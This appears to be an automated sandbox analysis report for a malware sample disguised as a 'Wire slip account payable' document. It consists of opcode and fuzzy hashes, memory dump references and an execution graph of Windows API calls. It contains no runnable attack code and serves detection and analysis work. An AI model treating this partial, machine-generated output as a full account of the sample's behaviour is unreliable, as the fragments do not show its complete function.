                                                                                                                    • Instruction ID: 34bce6299cd85d35fac950c4a36164680a31e469b828ffe9c13ac8d6483f8513
                                                                                                                    • Opcode Fuzzy Hash: 93297f06b3fb5deaec047d2f75f6bbc8ec5d2dd4cd67c3232b08c1682e22cff1
                                                                                                                    • Instruction Fuzzy Hash: ED418371E006098FCF70CEA9D881AAFFBF2EB44310F11492AE656D7650D330E9558B92
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 2cb6ee0a4f4df6e9887f2d0e37a19749ed17e801d7e74a0206d45eed244994d6
                                                                                                                    • Instruction ID: de69416380e7a3d4e1d97b7d85b4a31d40c3980e62dff5382dcbc548d2ad32aa
                                                                                                                    • Opcode Fuzzy Hash: 2cb6ee0a4f4df6e9887f2d0e37a19749ed17e801d7e74a0206d45eed244994d6
                                                                                                                    • Instruction Fuzzy Hash: 7D41F971E102458FDF608F68C880A7EFBF2FB45320F528965EA55DB291C634ED41CB92
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: fd01b21b01a43a079fc17b5a65cecacfc85022798e05c452cc8e74a6c4521ce0
                                                                                                                    • Instruction ID: 8af57b00d87148704411397aa4c584549f1e07332aac76e0e2e736f8523632fd
                                                                                                                    • Opcode Fuzzy Hash: fd01b21b01a43a079fc17b5a65cecacfc85022798e05c452cc8e74a6c4521ce0
                                                                                                                    • Instruction Fuzzy Hash: 3D31E430E102098FCF62DF69D55069EBBB2EF85304F158929DD05EB315EB71E84A8B80
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 65d36e40acda88fe2147593c38d7afaf1e2e7168b8ab6b26e89880bac7ddedff
                                                                                                                    • Instruction ID: 3d3209d05153c526d445cba06459343ed3e226063647c850de97619d2f02c032
                                                                                                                    • Opcode Fuzzy Hash: 65d36e40acda88fe2147593c38d7afaf1e2e7168b8ab6b26e89880bac7ddedff
                                                                                                                    • Instruction Fuzzy Hash: E4318B30E006099FCB15CF64D86469EB7B2BF89314F11C529EA06EB340EB31AD42CB81
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 2f4e0f799049b4397fbe49f048dbc29eab6299a88bd3722447433dc961d5374e
                                                                                                                    • Instruction ID: 2f6b3538db8c85e3ad339619e6311d98393e2b195c6a52bbb794a35617251e56
                                                                                                                    • Opcode Fuzzy Hash: 2f4e0f799049b4397fbe49f048dbc29eab6299a88bd3722447433dc961d5374e
                                                                                                                    • Instruction Fuzzy Hash: CB318B30E006099FCB45CF69D86469EB7B2BF89314F11C529EA16EB340EF71AD42CB41
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 2e883028e3756b0797886171d32f4b803f793ad391edba970a1bb86fa364948f
                                                                                                                    • Instruction ID: 7ae6b6e44b45f3426aee9b248935c377a8b85cc0704ffa9de9beed2057740bb9
                                                                                                                    • Opcode Fuzzy Hash: 2e883028e3756b0797886171d32f4b803f793ad391edba970a1bb86fa364948f
                                                                                                                    • Instruction Fuzzy Hash: 14217C35F01605AFDB40DF69D880BAEBBF5EB49650F118025E905E73A4E730ED028B91
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 213a1716fdcc7216fbe88b88ca7e52e02e5040938d5f09fff3459f3c594ea13e
                                                                                                                    • Instruction ID: ee5801466ea49f3a43533156ec9d27eb689172e68a4ab9b3aae3e573650494dd
                                                                                                                    • Opcode Fuzzy Hash: 213a1716fdcc7216fbe88b88ca7e52e02e5040938d5f09fff3459f3c594ea13e
                                                                                                                    • Instruction Fuzzy Hash: 6C21AE75F016059FDB40EFA9D880BAEBBF1EB48650F108025E905E7360E730ED018B91
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ef59ec0d37e3bac36c1c938183735fbed80864e0ccf1aa8773d6de021afec402
                                                                                                                    • Instruction ID: 1fe2e5a98ba2deee5ead7a529e9e4234b117964a30a4d1776860bf6d816bc783
                                                                                                                    • Opcode Fuzzy Hash: ef59ec0d37e3bac36c1c938183735fbed80864e0ccf1aa8773d6de021afec402
                                                                                                                    • Instruction Fuzzy Hash: 4221F630F100059FDF94DB28E9507AEB7F7EB85314F658825D905DB364EB329C828B81
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.4158488499.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_114d000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b54e263085e825c2b26ea0f17eb21346f3999201a0a43c53a0c4823e7cbcd50a
                                                                                                                    • Instruction ID: d2f44d07b17d6e0a5224897e207206656869b666c5bc7bae2843c44d229a3acb
                                                                                                                    • Opcode Fuzzy Hash: b54e263085e825c2b26ea0f17eb21346f3999201a0a43c53a0c4823e7cbcd50a
                                                                                                                    • Instruction Fuzzy Hash: AA217671200204DFCF09CF68E9C4B26BBA1FB98B14F20C5ADE8094B352C73AD447CA62
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 920389ec02a55c4b4da1e5423d4bdbea5a7d7040dac71b5c50eb2eb02babd036
                                                                                                                    • Instruction ID: 037a730281155eaf7eae2ad452725d93b8ad74d1e43491f4c34af3a5ea1138e8
                                                                                                                    • Opcode Fuzzy Hash: 920389ec02a55c4b4da1e5423d4bdbea5a7d7040dac71b5c50eb2eb02babd036
                                                                                                                    • Instruction Fuzzy Hash: 9A11C435B041289FDF549668C8546AF73EBEBC8354F018139C90AE7344EF69DC028BD2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8aaf3947dbc42cf3298e40b43da940149bd753c9279a9fc34605cc1380729fd4
                                                                                                                    • Instruction ID: 6420efb5165ef847588cc031d36e0aae84dc8e0c7afb7c630aa0045d525678ea
                                                                                                                    • Opcode Fuzzy Hash: 8aaf3947dbc42cf3298e40b43da940149bd753c9279a9fc34605cc1380729fd4
                                                                                                                    • Instruction Fuzzy Hash: 361142B6C002088FDB20CF9AD944ADEFBF4EB49320F10842AE959A7710C7B5A545CFA4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: adac6bd0ce11f5120f563b3cfd195ac28a88e917d64b8fab2dd2f6cc6194ab33
                                                                                                                    • Instruction ID: 8535f354d2bba23212958e647067f5f950e116cc61de2568cf60d59ed2534a9c
                                                                                                                    • Opcode Fuzzy Hash: adac6bd0ce11f5120f563b3cfd195ac28a88e917d64b8fab2dd2f6cc6194ab33
                                                                                                                    • Instruction Fuzzy Hash: 8101F132B001100FCB6196BDA41472EF7EBDBCA654F25883EEA0AC7756E925CC028392
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: fc2cc41cdafc9f05136ddb02aefbde36adea8610dcdc1804326e0241569f7bf7
                                                                                                                    • Instruction ID: 1f680a3cc610bec7222140a21512fb8c3cec8b8dd664be659a04a07b7b2dbb58
                                                                                                                    • Opcode Fuzzy Hash: fc2cc41cdafc9f05136ddb02aefbde36adea8610dcdc1804326e0241569f7bf7
                                                                                                                    • Instruction Fuzzy Hash: 3A21EDB5D01659AFCB00DF9AD984ADEFFB4BB49320F50812AE918A7210D374A944CFA5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 708f9a331597e8a7f27ba1e1fd05921571de926ebdd74b14d814498e80811789
                                                                                                                    • Instruction ID: 82912ac1c8a518685451cb3e7305bfd0e48ce44d0b8941a02dcdcfbf33fd6fa9
                                                                                                                    • Opcode Fuzzy Hash: 708f9a331597e8a7f27ba1e1fd05921571de926ebdd74b14d814498e80811789
                                                                                                                    • Instruction Fuzzy Hash: E50124317001004FCB21863CD85472EB3EBDFCA614F11882EEA4ECB340DB25ED468786
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.4158488499.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_114d000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                    • Instruction ID: 646b60f3ccf01c8585af501e250b154b58bf893a4021273e9710d24862e3fa4c
                                                                                                                    • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                    • Instruction Fuzzy Hash: ED11BB75504284CFDF16CF64D9C4B16BFA2FB88714F24C6AED8494B252C33AD44ACB62
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8048056261b2be4a56e114f5ae5d6dfd524a7668b3553922d76f5d1a75e5f2ce
                                                                                                                    • Instruction ID: ad5511f66f42c930fac1455e51e55223e1055ba025f6d5957f79f3265ae02641
                                                                                                                    • Opcode Fuzzy Hash: 8048056261b2be4a56e114f5ae5d6dfd524a7668b3553922d76f5d1a75e5f2ce
                                                                                                                    • Instruction Fuzzy Hash: E801DF36B144285BDF94A96C9C107FF73EAABC9260F01853ACA0AD7280EF658C0347D2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 57f6028c0428fcf73724f3a8457ae8e9cab30d838394db1f6776215dd958ec22
                                                                                                                    • Instruction ID: 5d229df50833171b5a2353b05c514a9b10d308d610b888a456e949452e6ba686
                                                                                                                    • Opcode Fuzzy Hash: 57f6028c0428fcf73724f3a8457ae8e9cab30d838394db1f6776215dd958ec22
                                                                                                                    • Instruction Fuzzy Hash: 451132B6C003088FCB10CF9AD944ADEFBF4EB88320F10842AE959B7610C7B5A545CFA5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 658b79945d084f4f3178e84a3d51275025f5212260cfb02e59007903156e2d6d
                                                                                                                    • Instruction ID: bc2b6dcc2a268a503bb3607b41464a3ae5071ec55f6e68f5423e6778ed259a93
                                                                                                                    • Opcode Fuzzy Hash: 658b79945d084f4f3178e84a3d51275025f5212260cfb02e59007903156e2d6d
                                                                                                                    • Instruction Fuzzy Hash: 4811CFB1D01219AFCB00DF9AD984ACEFFB4FB49320F10812AE918B7200D374A944CFA5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 76773b039398c01d0f10babf4a883c3dd5fe25b384dc0944a89003b4d9bfb23d
                                                                                                                    • Instruction ID: 7b2810c6d3273121496c479ef4dc8f7b0da0ad6a466e1f056b1711b6380826e5
                                                                                                                    • Opcode Fuzzy Hash: 76773b039398c01d0f10babf4a883c3dd5fe25b384dc0944a89003b4d9bfb23d
                                                                                                                    • Instruction Fuzzy Hash: 2901DC35B000101BDB6095BDA40472FE3DBCBCAB64F21C83EEA0EC7785E966DC024791
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 749c3b179ad01e2c479055a20582351e1a4a7657e93b7532a6648fb1ca11b583
                                                                                                                    • Instruction ID: 64d5ef612b3725cf021bbab2957e081b20eae8781185e2786abdef926b5ec144
                                                                                                                    • Opcode Fuzzy Hash: 749c3b179ad01e2c479055a20582351e1a4a7657e93b7532a6648fb1ca11b583
                                                                                                                    • Instruction Fuzzy Hash: 8401A730B105109FD765D63CE490B6EB7D6DB4A718F11C93DE60ACB355DA25DC0187C5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b0a51efc78dfe810a630fc10407848a4c8f9fe3798deaa3fec02e18ed3a6106b
                                                                                                                    • Instruction ID: ddf2ec0035833cb82ed3d239a8b38c79bfc93a92e2d5ab8d12200b3689a86b51
                                                                                                                    • Opcode Fuzzy Hash: b0a51efc78dfe810a630fc10407848a4c8f9fe3798deaa3fec02e18ed3a6106b
                                                                                                                    • Instruction Fuzzy Hash: 7E018C31B100105FCB64963DA85872EB3DBDBCAA64F218839EA0AC7344DE26DD434785
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 69c03972290947901520052e5a81af4eff60577342cb06c2d0b8b540562d0655
                                                                                                                    • Instruction ID: 65b6c9a564719bb340ce609d5bb2aeb0f04efd617c212892b9d26da2746ad5b2
                                                                                                                    • Opcode Fuzzy Hash: 69c03972290947901520052e5a81af4eff60577342cb06c2d0b8b540562d0655
                                                                                                                    • Instruction Fuzzy Hash: 4801A434B004105FDB64EA3DE890B5EB3DAD78A718F11C53DEA0AC7344DA25DC0247C5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 885e8ce60ecb5b3e2edf125238a4479ebef155721f6ac4b8311156016542e5fd
                                                                                                                    • Instruction ID: f8c7d09e59daac48b9f41390c280acccbe4d8265df73f4ba62b04b116ec48daa
                                                                                                                    • Opcode Fuzzy Hash: 885e8ce60ecb5b3e2edf125238a4479ebef155721f6ac4b8311156016542e5fd
                                                                                                                    • Instruction Fuzzy Hash: 20E0D871D242486BDF60CD74C95475E77BED742214F518DA5DC09C7211F536C9818781
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                    • API String ID: 0-2222239885
                                                                                                                    • Opcode ID: 68d81c96e22b62d5cecfa66aec3767e0ce72432d0472b97903ef2e88b7321274
                                                                                                                    • Instruction ID: 111d6007a933b6d24caf095f30e77b3fae5d9e1cd9326d2829b1a865af1ea03f
                                                                                                                    • Opcode Fuzzy Hash: 68d81c96e22b62d5cecfa66aec3767e0ce72432d0472b97903ef2e88b7321274
                                                                                                                    • Instruction Fuzzy Hash: 13122B30E002198FDB68DF65D954A9EB7F2BF88304F2185A9D509EB364DB319D85CF81
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                    • API String ID: 0-3823777903
                                                                                                                    • Opcode ID: 9506a03b223f96dc2068eef6181e31c083ec25ec1884dc851b269fdee5011f05
                                                                                                                    • Instruction ID: ca659769fcd54a51dca31cb2a70cf862796823470c7a0cebae19b545fe54307d
                                                                                                                    • Opcode Fuzzy Hash: 9506a03b223f96dc2068eef6181e31c083ec25ec1884dc851b269fdee5011f05
                                                                                                                    • Instruction Fuzzy Hash: 79916C30E00209DFDB69EB64D695BAEB7F2AB84304F118629E802EB354DB359D45CB91
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                    • API String ID: 0-390881366
                                                                                                                    • Opcode ID: 4c6f4d4f0fa6902bfa0ccc5593a29e47d45731a8ac3981413087682e56b1bcca
                                                                                                                    • Instruction ID: 9f0f2a2f9f1fdadd8eb27e3d22e9c8862b6f632aed092671ec8d231a781b69ac
                                                                                                                    • Opcode Fuzzy Hash: 4c6f4d4f0fa6902bfa0ccc5593a29e47d45731a8ac3981413087682e56b1bcca
                                                                                                                    • Instruction Fuzzy Hash: 2AF14C34A01209DFDB58EF68D594A6EB7B3BB88344F21C569D805DB368DB31DC86CB80
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $^q$$^q$$^q$$^q
                                                                                                                    • API String ID: 0-2125118731
                                                                                                                    • Opcode ID: 03ce189dc4b035f3f678c13226584ddcbd58b0b1979ff03b94bb13bc8299d961
                                                                                                                    • Instruction ID: e981a091ba28e78c8775727301a983a5792deebfba71b8a159f0c71ed86ad2c9
                                                                                                                    • Opcode Fuzzy Hash: 03ce189dc4b035f3f678c13226584ddcbd58b0b1979ff03b94bb13bc8299d961
                                                                                                                    • Instruction Fuzzy Hash: 94B16F70B012188FDB58EF78D5846AEB7F2AF88304F25886AD905DB355DB34DC86CB80
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $^q$$^q$$^q$$^q
                                                                                                                    • API String ID: 0-2125118731
                                                                                                                    • Opcode ID: a8198332f9a8f173f6d6b344e3774543906408d3af7351f320c8f00f5d1b896b
                                                                                                                    • Instruction ID: 21ce8d0565526bd2acef8ae40e26ceed4452e2d00f9af45ec8afadcaa252ff20
                                                                                                                    • Opcode Fuzzy Hash: a8198332f9a8f173f6d6b344e3774543906408d3af7351f320c8f00f5d1b896b
                                                                                                                    • Instruction Fuzzy Hash: CD51A330E102058FDF69EB68E5C06AEB7B6EB88305F118629ED06DB354DB31DC46CB91
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000008.00000002.4171647473.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_8_2_6850000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: LR^q$LR^q$$^q$$^q
                                                                                                                    • API String ID: 0-2454687669
                                                                                                                    • Opcode ID: 83d1126f982a6159d7c846becda3c54f7a3c33d55f88f0347e042b0192e06f64
                                                                                                                    • Instruction ID: 03ca9db89da2db8157f910f547cc01fb8fb394e6df1057542bc927b8178c30a3
                                                                                                                    • Opcode Fuzzy Hash: 83d1126f982a6159d7c846becda3c54f7a3c33d55f88f0347e042b0192e06f64
                                                                                                                    • Instruction Fuzzy Hash: F551F570B002059FDB58EB28D940A6EB7E6FF88704F158569E906DF3A9DB30EC45CB81

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:11.7%
                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                    Signature Coverage:0%
                                                                                                                    Total number of Nodes:142
                                                                                                                    Total number of Limit Nodes:8
                                                                                                                    execution_graph 23863 c0cfa0 23864 c0cfe6 GetCurrentProcess 23863->23864 23866 c0d038 GetCurrentThread 23864->23866 23868 c0d031 23864->23868 23867 c0d075 GetCurrentProcess 23866->23867 23870 c0d06e 23866->23870 23869 c0d0ab 23867->23869 23868->23866 23871 c0d0d3 GetCurrentThreadId 23869->23871 23870->23867 23872 c0d104 23871->23872 24030 c0ac10 24031 c0ac1f 24030->24031 24034 c0acf8 24030->24034 24039 c0ad08 24030->24039 24035 c0ad19 24034->24035 24036 c0ad3c 24034->24036 24035->24036 24037 c0af40 GetModuleHandleW 24035->24037 24036->24031 24038 c0af6d 24037->24038 24038->24031 24040 c0ad3c 24039->24040 24041 c0ad19 24039->24041 24040->24031 24041->24040 24042 c0af40 GetModuleHandleW 24041->24042 24043 c0af6d 24042->24043 24043->24031 24044 c0d5f0 DuplicateHandle 24045 c0d686 24044->24045 24046 6c1b470 24047 6c1b5fb 24046->24047 24049 6c1b496 24046->24049 24049->24047 24050 6c14954 24049->24050 24051 6c1b6f0 PostMessageW 24050->24051 24052 6c1b75c 24051->24052 24052->24049 23873 c04668 23874 c04672 23873->23874 23876 c04758 23873->23876 23877 c0477d 23876->23877 23881 c04858 23877->23881 23885 c04868 23877->23885 23883 c0488f 23881->23883 23882 c0496c 23882->23882 23883->23882 23889 c044b0 23883->23889 23886 c0488f 23885->23886 23887 c044b0 CreateActCtxA 23886->23887 23888 c0496c 23886->23888 23887->23888 23890 c058f8 CreateActCtxA 23889->23890 23892 c059bb 23890->23892 23893 6c184cf 23897 6c1a140 23893->23897 23911 6c1a130 23893->23911 23894 6c184de 23898 6c1a15a 23897->23898 23899 6c1a17e 23898->23899 23925 6c1a77a 23898->23925 23930 6c1a6ab 23898->23930 23934 6c1a8f4 23898->23934 23939 6c1a682 23898->23939 23944 6c1aa81 23898->23944 23953 6c1a66f 23898->23953 23958 6c1a79f 23898->23958 23962 6c1a4ec 23898->23962 23968 6c1a81d 23898->23968 23972 6c1a87d 23898->23972 23976 6c1b07d 23898->23976 23899->23894 23912 6c1a140 23911->23912 23913 6c1a17e 23912->23913 23914 6c1aa81 4 API calls 23912->23914 23915 6c1a682 2 API calls 23912->23915 23916 6c1a8f4 2 API calls 23912->23916 23917 6c1a6ab 2 API calls 23912->23917 23918 6c1a77a 2 API calls 23912->23918 23919 6c1b07d 2 API calls 23912->23919 23920 6c1a87d 2 API calls 23912->23920 23921 6c1a81d 2 API calls 23912->23921 23922 6c1a4ec 2 API calls 23912->23922 23923 6c1a79f 2 API calls 23912->23923 23924 6c1a66f 2 API calls 23912->23924 23913->23894 23914->23913 23915->23913 23916->23913 23917->23913 